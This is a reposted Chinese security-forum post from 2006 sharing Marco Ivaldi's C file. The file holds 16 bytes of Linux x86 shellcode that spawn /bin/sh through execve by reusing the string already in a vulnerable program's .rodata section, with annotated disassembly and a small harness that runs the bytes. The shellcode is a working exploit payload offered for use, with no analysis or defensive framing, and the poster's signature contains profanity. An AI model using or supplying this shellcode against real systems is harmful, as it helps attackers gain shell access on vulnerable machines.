linux/x86 re-use of /bin/sh string in .rodata shellcode 16 bytes

EvilOctal

团队执行官

Rank: 8 Rank: 8

E.S.T社区执行帐号

帖子: 9803
精华: 768
积分: 40177
阅读权限: 200
性别: 男
在线时间: 3968 小时
注册时间: 2004-7-4
最后登录: 2008-7-16

发短消息
加为好友
当前离线

楼主大中小发表于 2006-8-3 02:10 只看该作者

linux/x86 re-use of /bin/sh string in .rodata shellcode 16 bytes

文章作者：Marco Ivaldi

复制内容到剪贴板

代码:

/*

 * $Id: reusage-linux.c,v 1.3 2004/01/30 20:08:46 raptor Exp $

 *

 * reusage-linux.c - re-use of "/bin/sh" string in .rodata

 * Copyright (c) 2003 Marco Ivaldi <[email]raptor@0xdeadbeef.info[/email]>

 *

 * Short local shellcode for /bin/sh execve(). It re-uses the "/bin/sh"

 * string stored in the .rodata section of the vulnerable program. Change

 * the string address as needed (based on zillion&#39;s original idea).

 */



/*

 * execve("/bin/sh", ["/bin/sh"], NULL)

 *

 * 8049368:     31 c0             xor   %eax,%eax

 * 804936a:     bb 08 84 04 08       mov   $0x8048408,%ebx # change it

 * 804936f:     53               push  %ebx

 * 8049370:     89 e1             mov   %esp,%ecx

 * 8049372:     31 d2             xor   %edx,%edx

 * 8049374:     b0 0b             mov   $0xb,%al

 * 8049376:     cd 80             int   $0x80

 * 8049378:     00 00             add   %al,(%eax)

 */



char sc[] = /* 16 bytes */

"\x31\xc0\xbb\x08\x84\x04\x08\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";



main()

{

  int (*f)() = (int (*)())sc; f();

}

曾几何时，有人对我说：装B遭雷劈。我说：去你妈的。于是，这个人又对我说：如果再说脏话，上帝会惩罚你的。我说：我操上帝。结论：彪悍的人生不需要上帝。

TOP

‹‹ 上一主题 | 下一主题 ››